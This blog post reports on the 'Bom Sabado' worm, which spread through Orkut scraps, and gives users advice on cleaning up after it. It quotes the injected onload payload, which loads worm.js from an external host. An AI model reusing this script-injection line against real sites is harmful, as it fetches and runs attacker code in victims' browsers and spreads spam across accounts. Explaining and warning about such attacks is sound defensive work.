Bom Sabado! Orkut hacked!!

Damn, this is crazy.
Soon, my mailbox will be a spam box.
I keep getting this scrap “Bom Sabado” from every friend on Orkut.

Out of curiosity, I checked it out. It appears like a text. But then, things are always not what they seem…

It turned out to be an iframe attack. Here is what it looks like:

onload="a = document.createElement( 'script');a.src = '/' + '/tptools.o'+'rg/worm.js'+'##';

Needless to say, it executes a Javascript from www.tptools.org. I think the script is pulled off from the server. Hostgator, the service provider, has just suspended the website.

There are two points to work over:

  • The scrap is an iframe attack which spams into all of your friendlists.
  • You need to clear your cache, history and change your password as well as secret question in order to stay safe.

More on this later. Let me find something interesting.

And yes, keep out of Orkut until Monday.

Fact: Bom Sabado roughly translates into “Good Saturday!”

Leave a Reply

Your email address will not be published. Required fields are marked *